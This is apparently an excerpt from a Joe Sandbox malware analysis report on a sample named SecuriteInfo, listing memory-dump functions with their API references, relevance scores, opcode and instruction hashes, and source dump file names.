Opcode Fuzzy Hash: 200295572887393a96125adb1ca593bcadd44f10f0fb35972f6939545f1cdaac
Instruction Fuzzy Hash: 5E128579906228CFCB64DB64D88C79CB7B2BF4A305F1045E9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98414 Relevance: 1.8, APIs: 1, Instructions: 350COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c74904d42e9cd081fdf5c9c9413700e2108dad5632c92077306899adeb6ef9a8
Instruction ID: 7b422adb6d30cd6fbbc51bc2998099c3de2a5843f62451419902ff0748ebb608
Opcode Fuzzy Hash: c74904d42e9cd081fdf5c9c9413700e2108dad5632c92077306899adeb6ef9a8
Instruction Fuzzy Hash: A3029539906228CFCB64DB64D88C79CB7B2BF4A305F1045E9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98459 Relevance: 1.8, APIs: 1, Instructions: 343COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dc4b32083eb7cdc196a5a4821a5b6de52bd53c508e9dba2609de45b52cf5ff60
Instruction ID: 5d8eeca6c283ad1c5cb715a939619105308ba66c20eabcc34cf306171a177c66
Opcode Fuzzy Hash: dc4b32083eb7cdc196a5a4821a5b6de52bd53c508e9dba2609de45b52cf5ff60
Instruction Fuzzy Hash: 5C028539906228CFDB64DB64D88C79CB7B2BF4A305F1045E9D54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C9849E Relevance: 1.8, APIs: 1, Instructions: 336COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8dcaf94702a6b576da1e2e0c096204ed2a131145da60266269a2ec558673a1bc
Instruction ID: 5ad42cff7909e51f0dfd190d327043db49865c8afe3ba24b1fc9b2ebd5ec9ad7
Opcode Fuzzy Hash: 8dcaf94702a6b576da1e2e0c096204ed2a131145da60266269a2ec558673a1bc
Instruction Fuzzy Hash: 9F028639906218CFDB64DB64D88C79CB7B2BF4A305F2045D9D54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C984E3 Relevance: 1.8, APIs: 1, Instructions: 327COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 250ce95959069ee1aa8858d6c86efc01d5f774e0032b7b01c378527338afa488
Instruction ID: 91fa3190815b21b6e3763f75c715bb869b00ddf35b803cda08a6d3ec8b40870a
Opcode Fuzzy Hash: 250ce95959069ee1aa8858d6c86efc01d5f774e0032b7b01c378527338afa488
Instruction Fuzzy Hash: 8D028639906218CFDB64DB64D88C79CB7B2BF4A305F1045D9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C9851F Relevance: 1.8, APIs: 1, Instructions: 322COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 95f84a1ba56aadee26cb4f6082a193f20f8eaebace3b67538a87652b188812ba
Instruction ID: eebcfb54714f199cb38d27b00fd75f0d36a4e7763fffb703b54dc45c2207ce7e
Opcode Fuzzy Hash: 95f84a1ba56aadee26cb4f6082a193f20f8eaebace3b67538a87652b188812ba
Instruction Fuzzy Hash: FFF18539906228CFDB68DB64D88C79CB7B2BF4A305F1045D9E54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98564 Relevance: 1.8, APIs: 1, Instructions: 315COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cdc9e6bc2738d6127b75dbe012353b4890f6583409c334a0fcb35c50414766c1
Instruction ID: d3b183ff744248554a5f376b515c097fcc2ff005da083f398b28e09c60a433b9
Opcode Fuzzy Hash: cdc9e6bc2738d6127b75dbe012353b4890f6583409c334a0fcb35c50414766c1
Instruction Fuzzy Hash: 03F17539906228CFCB64DB64D88C79DB7B2BF4A305F1045D9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C985A9 Relevance: 1.8, APIs: 1, Instructions: 308COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f5d42a350b5f1e0eb62c0fc6cb097639369048dc990f2855923cbfc7a2a3a36f
Instruction ID: 38cc81ee9c3dd9fd14dd9c1ecfe8f1cd8a5170284e22a5fbf04909211d523fcf
Opcode Fuzzy Hash: f5d42a350b5f1e0eb62c0fc6cb097639369048dc990f2855923cbfc7a2a3a36f
Instruction Fuzzy Hash: 78F17539906228CFCB64DB64D88C79DB7B2BF4A305F2045D9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C985EE Relevance: 1.8, APIs: 1, Instructions: 301COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f399b75a4e7c50262a914f66264026ceade5f0696452e48cc575956735c7e850
Instruction ID: 676c215681efe043f6a2bb0f46457f8734ac21a47bd1fd84f74649d95d7fe94b
Opcode Fuzzy Hash: f399b75a4e7c50262a914f66264026ceade5f0696452e48cc575956735c7e850
Instruction Fuzzy Hash: EDF17539906228CFCB64DB64D88C79DB7B2BF4A306F1045D9E54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98633 Relevance: 1.8, APIs: 1, Instructions: 292COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 776abb9cc57c79488e3812823b23ff52af3f4e10aa1898167d9c78aba176e453
Instruction ID: 2967a15cff3666b4939cff6344b270ec6b5952aa2b8ccaa82fb0e25d1283b77a
Opcode Fuzzy Hash: 776abb9cc57c79488e3812823b23ff52af3f4e10aa1898167d9c78aba176e453
Instruction Fuzzy Hash: ABE18639906228CFCB64DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C9866F Relevance: 1.8, APIs: 1, Instructions: 287COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 19da07a89244ff9c8ce0fad5affc9b0b84894d83412210ab9948422c7162e911
Instruction ID: 50077aa092b2b35593cf36abefb8669bcd366fd092ab9b670cdcb0e33b03b2fe
Opcode Fuzzy Hash: 19da07a89244ff9c8ce0fad5affc9b0b84894d83412210ab9948422c7162e911
Instruction Fuzzy Hash: 02E18539906228CFCB64DB64D88C79DB7B2BF4A306F1045D9E54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C986B4 Relevance: 1.8, APIs: 1, Instructions: 280COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c89a0b1d38eca5f2f7b11dbf4e00fae26798a3bf9b04d34bf146b078c92ebe8e
Instruction ID: 93ee3dd05568f10bd50073df8c308c22505391bf74f3887efa7337814e3d19b8
Opcode Fuzzy Hash: c89a0b1d38eca5f2f7b11dbf4e00fae26798a3bf9b04d34bf146b078c92ebe8e
Instruction Fuzzy Hash: 57E18539906228CFCB64DB64D88C79DB7B2BF4A306F1045D9E54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C986F9 Relevance: 1.8, APIs: 1, Instructions: 273COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 911badec4df5a69690fe92c2d6839977144653ad9a37fd0665be7369e127f5cd
Instruction ID: aae83ce583ad8e1c5df2f7f665fed68e3e7034427b1012a8574dae139036ea58
Opcode Fuzzy Hash: 911badec4df5a69690fe92c2d6839977144653ad9a37fd0665be7369e127f5cd
Instruction Fuzzy Hash: 69E18639906228CFCB64DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C9873E Relevance: 1.8, APIs: 1, Instructions: 266COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2aa60cc5b79f1aaa49621089e304ed35d244a6d6165ff7aa212b84a52325a2a6
Instruction ID: d66a5931fc068975a76d068f1aa2d357866ce61d13c4be547210547539952738
Opcode Fuzzy Hash: 2aa60cc5b79f1aaa49621089e304ed35d244a6d6165ff7aa212b84a52325a2a6
Instruction Fuzzy Hash: 3DD18539906228CFDB68DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00F60868 Relevance: 1.8, APIs: 1, Instructions: 265memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 00F60B06

Memory Dump Source

Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 5f8fc4ad73e5fd46868c68da1179f7bd059d2eabbbb86f25108897b2eb1fd944
Instruction ID: 0cae8cae825213d716cecc66b16139d2b92374406e73b924ce9adfc95e0ad9e6
Opcode Fuzzy Hash: 5f8fc4ad73e5fd46868c68da1179f7bd059d2eabbbb86f25108897b2eb1fd944
Instruction Fuzzy Hash: 1181F275E042488FDF10CFA9C8847AEBBB1EF49324F24846AE409E7391DB398C45DB91

Uniqueness

Uniqueness Score: -1.00%

Function 05C98783 Relevance: 1.8, APIs: 1, Instructions: 259COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 65a94f8d954a624ecd195ce019658905b7694057847b931ad230d26d7b9c68b0
Instruction ID: 35ac4e7700e51e20f7e3fab96c5c9fd9ed69a80274dbcca2969dcb0847763240
Opcode Fuzzy Hash: 65a94f8d954a624ecd195ce019658905b7694057847b931ad230d26d7b9c68b0
Instruction Fuzzy Hash: 7CD18539906228CFCB68DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C987C8 Relevance: 1.8, APIs: 1, Instructions: 252COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8d8e5867226bb832521ca929efb612bfbfc5568bd9461cba75545500ac955a1b
Instruction ID: 693eb7eb62c6fef524be2d8d44302bb93fa5485ec1bf9b0358a445af83bcdc29
Opcode Fuzzy Hash: 8d8e5867226bb832521ca929efb612bfbfc5568bd9461cba75545500ac955a1b
Instruction Fuzzy Hash: D9D18539906228CFCB64DB64D88C79DB7B2BF4A306F2045D9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C9880D Relevance: 1.7, APIs: 1, Instructions: 245COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3b8d4f177cf62cbb1f981b81b62b8f26f892f53dd75b45353febd74e893b2edc
Instruction ID: aa4204d85ca98f144e1fbe5df4a7a97d20741ccfbdf4f7bc6ff0c9c805398e6c
Opcode Fuzzy Hash: 3b8d4f177cf62cbb1f981b81b62b8f26f892f53dd75b45353febd74e893b2edc
Instruction Fuzzy Hash: 6DD18639906228CFDB64DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98852 Relevance: 1.7, APIs: 1, Instructions: 238COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c12f06afc38cb31ce046317d73442c68378ba2f74c78a8d960f3d4ce69382b2a
Instruction ID: ffb47b9cebb51a637441f0a4084bf6e4b015658e077101a7910fc69de9c1acad
Opcode Fuzzy Hash: c12f06afc38cb31ce046317d73442c68378ba2f74c78a8d960f3d4ce69382b2a
Instruction Fuzzy Hash: 55C18539906228CFCB68DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98897 Relevance: 1.7, APIs: 1, Instructions: 231COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d8aa4e50bb4bc494116422269b3d5a8213cf20265788688a7d7c2ff575231c8d
Instruction ID: b639cf374a78da9e652848e0666ab72f024a53553d838a0d168399c9ba977c4e
Opcode Fuzzy Hash: d8aa4e50bb4bc494116422269b3d5a8213cf20265788688a7d7c2ff575231c8d
Instruction Fuzzy Hash: C2C18539906228CFCB68DB64D88C79DB7B2BF4A306F1045D9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C988DC Relevance: 1.7, APIs: 1, Instructions: 222COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d7307cd0cad39d84433519a5cd8350183f1ba6a69a922f37591422984eac313e
Instruction ID: 2a188f24e766c64d90e6daafc63b9bc9887f0f98504c3d59435acff2f53b6355
Opcode Fuzzy Hash: d7307cd0cad39d84433519a5cd8350183f1ba6a69a922f37591422984eac313e
Instruction Fuzzy Hash: ABB18639906228CFCB68DB64D88C79DB7B2BF4A306F2045D9D54A93350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98918 Relevance: 1.7, APIs: 1, Instructions: 217COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 407081ab43427c2c75691aec2013e76a1b36700b7508058f43d1ffaf823a21fd
Instruction ID: ec73308f3d047763374eda86598056fb451d5224fef7a9991797c05710fc4882
Opcode Fuzzy Hash: 407081ab43427c2c75691aec2013e76a1b36700b7508058f43d1ffaf823a21fd
Instruction Fuzzy Hash: 0FB18639906228CFCB64DB64D88C79DB7B2BF4A306F1045D9D54A93350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C9895D Relevance: 1.7, APIs: 1, Instructions: 210COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e54d369cf52f470fbe5d5e56e4f629fa07d34086ddc33b8caec11f6dbf979a41
Instruction ID: 48b94333390fab03e040aa0d6e7d919a88daaa965799307f08832fe244ecf338
Opcode Fuzzy Hash: e54d369cf52f470fbe5d5e56e4f629fa07d34086ddc33b8caec11f6dbf979a41
Instruction Fuzzy Hash: 44B19539905228CFCB68DB64D88C79DB7B2BF4A306F2045D9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C989A2 Relevance: 1.7, APIs: 1, Instructions: 203COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fa31637d8554ea0007b3cdc4b3c47958b83de4a4c2bd7e40a8de7db464bbbbc9
Instruction ID: c6fc8a7436ba23ddd5b86f51e0ec019b303fd5ea595120ac3a95b5b657efc947
Opcode Fuzzy Hash: fa31637d8554ea0007b3cdc4b3c47958b83de4a4c2bd7e40a8de7db464bbbbc9
Instruction Fuzzy Hash: 57B18539905228CFCB68DB64D88C69DB7B2BF4A306F2045D9D54AA3350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C989E7 Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e825617f1d03b44f6aacadf02106fa3553959597b65788e2eb3c0b2972b4da89
Instruction ID: f4b9ef0ec1d9e40bde2669ffcfede0e8cc42683ca2c036b120a2bd38277da72f
Opcode Fuzzy Hash: e825617f1d03b44f6aacadf02106fa3553959597b65788e2eb3c0b2972b4da89
Instruction Fuzzy Hash: 6BA19639906228CFDB68DB64D88C79DB7B2BF4A306F2045D9D54A93350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98A23 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 426764634eb69ac666f0bb9896d5be1be600055294c5755a39d7e03db9996091
Instruction ID: baab79da7c9cad1669d0afa2971e489004d161ca7dc8e3b8043dedcf07205afc
Opcode Fuzzy Hash: 426764634eb69ac666f0bb9896d5be1be600055294c5755a39d7e03db9996091
Instruction Fuzzy Hash: DFA19539906228CFCB68DB64D88C79DB7B2BF4A306F2045D9D54A93350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98A5F Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 39f53766e3ed72c4a07ad43c827959a683d870618983f3f45be1d5aca822df52
Instruction ID: d658aec027e4a662ab61e7ab855d25d0279e51f97e73f17beddbb8a8c1746fb6
Opcode Fuzzy Hash: 39f53766e3ed72c4a07ad43c827959a683d870618983f3f45be1d5aca822df52
Instruction Fuzzy Hash: 8C918539905228CFCB64DB65D88C79DB7B2BF4A305F2045D9D54A93350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98AA4 Relevance: 1.7, APIs: 1, Instructions: 175COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8a8500c1c29a392e6f1c00de6b11e00b63fa9d05ae5459d01aeef6e464b3a3e3
Instruction ID: 2c1b5059c62fbdc3b055e4663f505ca15c100e23ce7c4f7a3aaad7611220565e
Opcode Fuzzy Hash: 8a8500c1c29a392e6f1c00de6b11e00b63fa9d05ae5459d01aeef6e464b3a3e3
Instruction Fuzzy Hash: 44918539906228CFCB64DB65D88C6ADB7B2BF4A305F2045D9D54A93350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98AE9 Relevance: 1.7, APIs: 1, Instructions: 168COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 71d295388c5b61aa8853a84a613dfd0ff554966c05b0afb45c4dbb2a5145e38f
Instruction ID: c553a94c9f2d31e826000908d8369eb4c716421005a2b92415332f083de6b54c
Opcode Fuzzy Hash: 71d295388c5b61aa8853a84a613dfd0ff554966c05b0afb45c4dbb2a5145e38f
Instruction Fuzzy Hash: 38918439906228CFDB68DB64D88C79DB7B2BF4A305F2045D9D54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98B31 Relevance: 1.7, APIs: 1, Instructions: 161COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0d91de160523b022bdc5fddf4ae0bd3c4b32eb91bb83fbf33d5557399b693b3b
Instruction ID: 1f42b5850f23fad39fad2c6ba306806c838edaefc05ffa7d55e2bfd56b0007e8
Opcode Fuzzy Hash: 0d91de160523b022bdc5fddf4ae0bd3c4b32eb91bb83fbf33d5557399b693b3b
Instruction Fuzzy Hash: F6819439906228CFCB64DB64D88D79DB7B2BF4A305F2045D9D54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98B79 Relevance: 1.7, APIs: 1, Instructions: 154COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9b8dc0efaa2e709f2cb19e568050062c0bdb96027545610b7c53dc9cb8ab839c
Instruction ID: a769a1e7b454a60fb4f7ef2dc9273fa500961a199b277e8927a6dd9abf790d95
Opcode Fuzzy Hash: 9b8dc0efaa2e709f2cb19e568050062c0bdb96027545610b7c53dc9cb8ab839c
Instruction Fuzzy Hash: E2819539906228CFCB64DB64D88CB9DB7B2BF4A305F1045D9D54AA3350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98BC1 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ba7aa309c6d0b22a8a70fcf2b6c91f3109f5574c671e7570046b03c40d753423
